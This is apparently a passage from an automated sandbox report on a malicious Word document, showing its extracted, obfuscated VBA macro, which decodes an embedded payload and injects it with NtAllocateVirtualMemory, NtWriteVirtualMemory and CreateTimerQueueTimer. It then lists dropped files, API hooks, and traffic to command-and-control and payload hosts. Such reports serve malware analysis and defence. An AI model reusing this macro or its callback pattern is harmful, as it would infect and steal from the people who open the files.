Public Declare PtrSafe Function naboom Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (campagne As Any) As LongPtr
' Driving us to your house
' You wrecked my whole world when you came
' I was doing alright
Public Declare PtrSafe Function filefish Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (afflictive As LongPtr, faute As LongPtr, ByVal unshockable As LongPtr, poundfoolishByVal As LongPtr, earthborn As LongPtr, ByVal boastful As LongPtr) As LongPtr
' The moon went hiding, stars quit shining
' But just your sight had my heart storming
Public Declare PtrSafe Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal algorithmic As Any, ByVal distraction As Any, ByVal acrodont As Any, ByVal anglicism As Any, ByVal dynamism As Any) As LongPtr
' Rain was driving, thunder, lightning
' Started talking bout us again
' If I woulda just layed my drink down
' I was doing alright
' But just your sight had my heart storming
' The moon went hiding, stars quit shining
#End If
' But you rolled in with your hair in the wind
' You wrecked my whole world when you came
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
' But you rolled in with your hair in the wind
' I was doing alright
Public Declare Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal berried As Any, ByVal astroloma As Any, ByVal decumbency As Any, ByVal insupportable As Any, ByVal dalmatic As Any) As Long
' Baby, without warning
' Baby, without warning
' But you rolled in with your hair in the wind
' Then you rolled in with your hair in the wind
Public Declare Function filefish Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (deterrent As Long, nonoscillatory As Long, ByVal pimple As Long, bryozoanByVal As Long, synchronistical As Long, ByVal nilpotent As Long) As Long
' But just your sight had my heart storming
' I wouldnt be in my truck
' I was doing alright
' We locked eyes over whiskey on ice
' Knew it was gonna be a long night
' Rain was driving, thunder, lightning
' If I woulda just layed my drink down
' We locked eyes over whiskey on ice
Public Declare Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (opinionatist As Any, ByVal dehort As Any, ByVal peripherally As Any, ByVal lipstick As Any, ByVal survene As Any, ByVal ashtoreth As Any, ByVal craftiness As Any) As Long
' But just your sight had my heart storming
' And hit me like a hurricane
' Baby, without warning
' Knew it was gonna be a long night
#End If
' Hit me like a hurricane
' But just your sight had my heart storming
Function moving()
Dim pater(255) As Byte
choking = 3 - 100 + 162
Do
pater(choking) = choking - 65
choking = choking + 1
Loop While choking <= 90 + 1
choking = 40 + 8
Do
pater(choking) = choking + 4
choking = choking + 1
Loop While choking <= 50 + 8
choking = 90 + 7
Do
pater(choking) = choking - 71
choking = choking + 1
Loop While choking <= 120 + 3
pater(47) = 60 + 3
choking = 40 + 3
pater(choking) = 60 + 2
moving = pater
End Function
Function denunciation(attainture, abbess, lait)
Select Case lait
Case 33 + (10 / 2 - 5)
denunciation = attainture \ abbess
Case 43 + (5 - 3) / 2 - 1
denunciation = attainture And abbess
Case 51 + (56 / 7 - 4 * 2)
denunciation = attainture * abbess
End Select
End Function
Function bizons(wrd, buls, lky)
#If 2 + (12 * 2) > 14 / 2 And Win64 > (12 - 6 * 2) * 1 Then
Dim aln As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If 2 + (12 * 2) > 14 / 2 And Not (12 - 6 * 2) * 1 < Win64 Then
Dim aln As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
aln = buls
deble = lky
dan2 = alate(wrd, aln, deble, aln, aln, aln, aln)
End Function
Function ounce(ovenbird) As String
subsystem = Math.Round(232)
Dim aurist As Long
Dim kickback As Long
Dim comburent As Variant
Dim beats(63) As Long
Dim achillea As Long
disengaged = fandi
Dim acromegalic(6962) As Byte
Dim boxed As String
Dim cruzeiro As Long
Dim dendroid As Long
Dim oscitancy(63) As Long
Dim exocoetidae As Long
astonished = "bedizen"
Dim fourply As Variant
Dim ornateness As Integer
Dim zannichellia() As Byte
Dim bassetting(63) As Long
Dim anserinae As Long
antioxidant = 75 - 98 + 4055
nadolol = 58 + 16711622
discretional = 18 + 45
Dim cephalotus As String
anemopsis = 262140 + 4
afterburden = 258040 + 8
Dim jucundity As Long
opener = 16515070 + 2
galangal = 250 + 6
recantation = 8 + 56
prognostication = 113 - 43 + 65210
camelidae = 46 + 4050
cinch = 51 + 204
albedo = 65530 + 6
Dim deception As Long
marjoram = 86 - 86
archesporial = 112 - 12 + 7743
Dim radiolaria() As Byte
Dim herbage As Integer
Dim forlornness As Integer
radiolaria = VBA.StrConv(ovenbird, 128)
Dim discorporate As Byte
chastity = 30 + 3
ataxic = 9770 + 5
brassia = 231680 + 3
Pmt 0, chastity, 27112, 45784, 4
christendom = 7840 + 3
aux = vbKeyShift - 12
For ridotto = 0 To christendom
If ridotto Mod 2 = 0 Then
radiolaria(ridotto) = radiolaria(ridotto) - aux
Else
radiolaria(ridotto) = radiolaria(ridotto) - (aux - 1)
End If
Next ridotto
lip = 60 + 7
chersonese = 2630 + 3
maitreya = 308410 + 10
Pmt 0, lip, 29053, 19350, 6
ornateness = 4 - 4
namtar = 47 + 11 - 58
entanglement = 40 + 3
dissolved = moving
For cruzeiro = (7 - 7) * 1 To (50 + 13) * (5 - 4)
oscitancy(cruzeiro) = denunciation(cruzeiro, recantation, 51)
bassetting(cruzeiro) = denunciation(cruzeiro, camelidae, 51)
beats(cruzeiro) = denunciation(cruzeiro, anemopsis, 51)
Next cruzeiro
elicit = 60 + 7
bedight = 10180 + 10
chigetai = 501730 + 4
Pmt 0, elicit, 33309, 28515, 5
zannichellia = radiolaria
valley = 72 - 68
earpiercing = 50 + 2
democrats = 32080 + 6
algebra = 483550 + 10
Pmt 0, earpiercing, 2593, 13488, 2
yank = 46 - 52 + 9
First = Fix(285)
astonished = fandi
airsick = yank + 1
milklivered = 86 + 48 - 132
For exocoetidae = (4 - 4) * 1 To christendom
authentication = zannichellia(exocoetidae)
jurisdiction = zannichellia(exocoetidae + 2)
corso = bassetting(dissolved(zannichellia(exocoetidae + 1)))
filled = oscitancy(dissolved(jurisdiction)) + dissolved(zannichellia(exocoetidae + yank))
aurist = beats(dissolved(authentication)) + corso
aurist = aurist + filled
cruzeiro = denunciation(aurist, nadolol, (40 + 3))
acromegalic(dendroid) = denunciation(cruzeiro, albedo, (30 + 3))
cruzeiro = denunciation(aurist, prognostication, (40 + 3))
acromegalic(dendroid + 1) = denunciation(cruzeiro, galangal, (30 + 3))
acromegalic(dendroid + milklivered) = denunciation(aurist, cinch, (40 + 3))
dendroid = dendroid + milklivered + 1
exocoetidae = exocoetidae + 3
Next
ounce = acromegalic
End Function
Function pinochet(purina)
Dim windser As Integer
Dim tristan As Integer
fixoid = purina * 12
Dim sitroen As Variant
subway2 = purina * 2
Dim cowen() As Byte
#If (3 * 4 + purina) > (7 - 2 * 1) And Win64 > (10 - purina * 2) * 2 Then
tristan = subway2
#End If
#If (3 * 4 + purina) > (7 - 2 * 1) And Not (10 - purina * 2) * 2 < Win64 Then
tristan = (120 - fixoid)
#End If
subway3 = subway2 + tristan
pinochet = tristan
End Function"
File "affectingly.frm" (Streampath: "Macros/VBA/affectingly") has code: "" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF19387516EAE619AF.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF45056EC9CC3E5E74.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DF55FD23126D685A82.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFF2460AC602BCCE33.TMP"
"WINWORD.EXE" created file "%TEMP%\~DFC945604069A833E3.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCounterMutex"
"Local\10MU_ACB10_S-1-5-5-0-59428"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZonesCacheCounterMutex"
"Local\10MU_ACBPIDS_S-1-5-5-0-59428"
"Local\ZonesLockedCacheCounterMutex"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59428"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59428"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\DBWinMutex"
"\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6C3D0000
- source
- Loaded Module
-
Process launched with changed environment
- details
- Process "svchost.exe" was launched with new environment variables: "WecVersionForRosebud.DC4="4""
- source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "cmd /K" on 2017-8-8.08:11:30.150
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "mspim_wnd32" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "svchost.exe"
Spawned process "cmd.exe" with commandline "cmd /K"
Spawned process "svchost.exe"
Spawned process "BNEBB1.tmp"
Spawned process "explorer.exe" - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Tue Aug 8 15:09:32 2017 mtime=Tue Aug 8 15:09:32 2017 atime=Tue Aug 8 15:09:38 2017 length=211456 window=hide"
"~$f3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc" has type "data"
"index.dat" has type "data"
"BNEBB1.tmp" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"5820874.cvr" has type "data"
"MSForms.exd" has type "data"
"~WRS{22AB9B54-42E2-4ABD-8093-369D8FF6C997}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22AB9B54-42E2-4ABD-8093-369D8FF6C997}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "q.bm/E!r_IaPE7W"
Heuristic match: "api.ipify.org"
Heuristic match: "cethenjustte.com"
Heuristic match: "ariegenet.fr"
Heuristic match: "tingotosling.com"
Heuristic match: "keportsitno.com"
Pattern match: "ns.adobe.com/xap/1.0/"
Heuristic match: "?]yMcOQ'4|vU^NlP4~MqR.co"
Heuristic match: "8@bVqjqVRTY#n04Wt]v*UWb_N*UWb]J|OJc5+H7\AFBwOYqUcEcvfGkGlqr)G?a5?nO/XjGPv1Z!`{MI?YF}o}{-V_Y%L iLUq>{[I3pRxnX1I<WVKd6o?fw4Sodb+$127I%E}J>i:;N\BHe/8YH#yUSmKa'.ad"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e92399c5ee" to virtual address "0x765A5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9c5326fef" to virtual address "0x76086143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0badcc6350068dcf5116cc3" to virtual address "0x053E0C74"
"WINWORD.EXE" wrote bytes "e96033c3ee" to virtual address "0x765A4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba5cc6350068dcf5116cc3" to virtual address "0x053E0C54"
"WINWORD.EXE" wrote bytes "b811110000663d33c0bad8d03f0568dcf5116cc3" to virtual address "0x053E0CB4"
"WINWORD.EXE" wrote bytes "ba90244705b98b7b116cffe1" to virtual address "0x003A1F1A"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba1cc7350068dcf5116cc3" to virtual address "0x053E0C94"
"WINWORD.EXE" wrote bytes "e99a54c2ee" to virtual address "0x765A3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "c4ca677680bb6776aa6e68769fbb677608bb677646ce677661386876de2f6876d0d96776000000001779a7754f91a7757f6fa775f4f7a77511f7a775f283a775857ea77500000000" to virtual address "0x6E121000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e99e48b1ee" to virtual address "0x76683D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "ddd4992a" to virtual address "0x6D6E10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "faaeae2a" to virtual address "0x6C419904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "0346e1cb" to virtual address "0x6BFA42C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e93655c3ee" to virtual address "0x765A3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "ba4c224705b98b7b116cffe1" to virtual address "0x003A1F42"
"WINWORD.EXE" wrote bytes "ba88d33f05b98b7b116cffe1" to virtual address "0x003A1F06"
"WINWORD.EXE" wrote bytes "86fbfd2a" to virtual address "0x653F0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "a6740400" to virtual address "0x6C211F20" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "2a80f02a" to virtual address "0x6D8DCA70" (part of module "GFX.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
bad.doc
- Filename
- bad.doc
- Size
- 207KiB (211456 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 8 12:42:00 2017, Last Saved Time/Date: Tue Aug 8 15:47:00 2017, Number of Pages: 3, Number of Words: 0, Number of Characters: 5, Security: 8
- Architecture
- WINDOWS
- SHA256
- 7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38
- MD5
- 6c5b5cbc6676c3240ac49d15c9576a41
- SHA1
- 7d687aa995c1b935943d6cbb407e34ece7203684
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Hybrid Analysis
Analysed 6 processes in total (System Resource Monitor).
- WINWORD.EXE /n "C:\7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc (PID: 3524)
- svchost.exe (PID: 1588)
- cmd.exe cmd /K (PID: 824)
- svchost.exe (PID: 2412)
- BNEBB1.tmp (PID: 1584)
- explorer.exe (PID: 1664)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
cethenjustte.com | 86.110.117.167 | Bizcn.com,Inc. | Russian Federation |
ariegenet.fr | 213.186.33.19 | OVH (Name Server: dns14.ovh.net; Creation Date: Sat, 23 Jan 2010 00:00:00 GMT) | France |
keportsitno.com | 185.133.42.219 | Bizcn.com,Inc. | Russian Federation |
api.ipify.org | 23.21.223.243 | eNom, Inc. (Name Server: NS1.DNSIMPLE.COM; Creation Date: Sun, 05 Jan 2014 22:02:15 GMT) | United States |
tingotosling.com | 185.42.14.83 | Bizcn.com,Inc. | Russian Federation |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
23.21.223.243 | 80 TCP | svchost.exe PID: 1588 | United States |
86.110.117.167 | 80 TCP | svchost.exe PID: 1588; svchost.exe PID: 2412 | Russian Federation |
213.186.33.19 | 80 TCP | svchost.exe PID: 1588 | France |
185.42.14.83 | 80 TCP | explorer.exe PID: 1664 | Russian Federation |
185.133.42.219 | 80 TCP | explorer.exe PID: 1664 | Russian Federation |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | Raw request | Response |
---|---|---|---|---|
23.21.223.243:80 (api.ipify.org) | GET | api.ipify.org/ | GET / HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: api.ipify.org<br>Cache-Control: no-cache | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: cethenjustte.com<br>Content-Length: 111<br>Cache-Control: no-cache | 200 OK |
213.186.33.19:80 (ariegenet.fr) | GET | ariegenet.fr/wp-content/plugins/easyrotator-for-wordpress/1 | GET /wp-content/plugins/easyrotator-for-wordpress/1 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: ariegenet.fr<br>Cache-Control: no-cache | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/mlu/forum.php | POST /mlu/forum.php HTTP/1.0<br>Host: cethenjustte.com<br>Accept: */*<br>Accept-Encoding: identity, *;q=0<br>Accept-Language: en-US<br>Content-Length: 205<br>Content-Type: application/octet-stream<br>Connection: close<br>Content-Encoding: binary<br>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/mlu/forum.php | POST /mlu/forum.php HTTP/1.0<br>Host: cethenjustte.com<br>Accept: */*<br>Accept-Encoding: identity, *;q=0<br>Accept-Language: en-US<br>Content-Length: 205<br>Content-Type: application/octet-stream<br>Connection: close<br>Content-Encoding: binary<br>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 200 OK |
213.186.33.19:80 (ariegenet.fr) | GET | ariegenet.fr/wp-content/plugins/easyrotator-for-wordpress/2 | GET /wp-content/plugins/easyrotator-for-wordpress/2 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: ariegenet.fr<br>Cache-Control: no-cache | 200 OK |
213.186.33.19:80 (ariegenet.fr) | GET | ariegenet.fr/wp-content/plugins/easyrotator-for-wordpress/3 | GET /wp-content/plugins/easyrotator-for-wordpress/3 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: ariegenet.fr<br>Cache-Control: no-cache | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/d2/about.php | POST /d2/about.php HTTP/1.0<br>Host: cethenjustte.com<br>Accept-Encoding: identity, *;q=0<br>Accept-Language: en-US<br>Content-Length: 233<br>Content-Type: application/octet-stream<br>Connection: close<br>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Content-Encoding: binary | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/d2/about.php | POST /d2/about.php HTTP/1.0<br>Host: cethenjustte.com<br>Accept-Encoding: identity, *;q=0<br>Accept-Language: en-US<br>Content-Length: 233<br>Content-Type: application/octet-stream<br>Connection: close<br>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Content-Encoding: binary | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 261<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 1034<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 1107<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 561<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 780<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 577<br>Connection: Close | 200 OK |
86.110.117.167:80 (cethenjustte.com) | POST | cethenjustte.com/ls5/forum.php | POST /ls5/forum.php HTTP/1.1<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: cethenjustte.com<br>Content-Length: 111<br>Cache-Control: no-cache | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 799<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 929<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 686<br>Connection: Close | 200 OK |
185.133.42.219:80 (keportsitno.com) | POST | keportsitno.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: keportsitno.com<br>Content-Length: 643<br>Connection: Close | 200 OK |
185.42.14.83:80 (tingotosling.com) | POST | tingotosling.com/bdl/gate.php | POST /bdl/gate.php HTTP/1.1<br>Accept: */*<br>Cache-Control: no-cache<br>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)<br>Host: tingotosling.com<br>Content-Length: 432<br>Connection: Close | 200 OK |
